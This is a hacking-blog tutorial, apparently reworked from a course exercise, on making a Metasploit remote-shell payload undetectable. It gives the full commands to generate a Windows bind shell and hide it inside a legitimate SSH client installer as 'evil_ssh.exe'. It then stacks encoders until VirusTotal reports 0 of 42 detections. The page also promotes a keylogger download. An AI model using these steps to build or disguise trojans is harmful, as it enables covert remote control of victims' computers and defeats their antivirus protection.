What You Need ??
A BackTrack Linux machine, real or virtual. I used BackTrack 5 R2, but other versions of BackTrack are probably OK too.Creating a Listener
This is a simple payload that gives the attacker remote control of a machine. It is not a virus, and won't spread, but it is detected by antivirus engines. In BackTrack, in a Terminal window, execute these commands:command :
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe
You should see the listen.exe file, as shown below:
data:image/s3,"s3://crabby-images/2f13a/2f13ab98c8be265a4a4083cd7efa1aff64c817c5" alt="make undectable keylogger"
Analyzing the Listener with VirusTotal
In BackTrack, click Applications, Internet, "Firefox Web Browser".\In Firefox, go to https://www.virustotal.com/
Click the "Choose File" button. Navigate to /root and double-click the listen.exe
"listen.exe" appears in the "Choose File" box, as shown below:
data:image/s3,"s3://crabby-images/a446d/a446d4c0180dbc5b5192c9a9642fc4b2c48d10e2" alt="make undectable keylogger"
In the VirusTotal web page, click the "Scan It!" button.
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.
data:image/s3,"s3://crabby-images/8130c/8130cb2eeb147bd0bc1a4d54baf4546f785ff6e9" alt="make undectable keylogger"
Saving the Screen Image
Make sure the result is visible, showing something like "Detection rate: 33/42", as shown above. Save a screen capture with a filename of "Proj 6xa from YOUR NAME".Encoding the Listener
This process will encode the listener, and insert it into an innocent SSH file.In BackTrack, in a Terminal window, execute these commands:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*
You should see the evil-ssh.exe file, as shown below:
data:image/s3,"s3://crabby-images/3879b/3879b96ae890ea92680a769bb7d5ea35694bcb90" alt="make undectable keylogger"
Analyzing the Encoded Listener with VirusTotal
In Firefox, go to https://www.virustotal.com/Click the "Choose File" button. Navigate to /root and double-click the evil-ssh.exe file.
In the VirusTotal web page, click the "Scan It!" button.
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.
data:image/s3,"s3://crabby-images/3cf24/3cf243ca85107095de547241f3cf7e65c9859521" alt="make undectable keylogger"
Encoding the Listener Again
This process will encode the listener with several different encodings, as recommended by Keith Burton (Thanks!). In BackTrack, in a Terminal window, execute these commands:msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*
You should see several files, as shown below:
data:image/s3,"s3://crabby-images/dfbeb/dfbeb5bdd129b491a53c9a86e62469ae20c860fe" alt="make undectable keylogger"
Analyzing the Encoded Listener with VirusTotal
In Firefox, go to https://www.virustotal.com/Click the "Choose File" button. Navigate to /root and double-click the listen5.exe file.
In the VirusTotal web page, click the "Scan It!" button.
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now--0 out of 42, when I did it, as shown below. You may see different numbers.
data:image/s3,"s3://crabby-images/a8661/a8661b48273705be2563dff46e157ce146f63c43" alt="make undectable keylogger"
thats it friends..
HappY HaCkInG..
Filed Under: CRYPTER , CRYPTOGRAPHY
data:image/s3,"s3://crabby-images/55531/55531a99f2d7cf885ecf2c5d041060433785da4e" alt=""
Click Here To Download Winspy Keylogger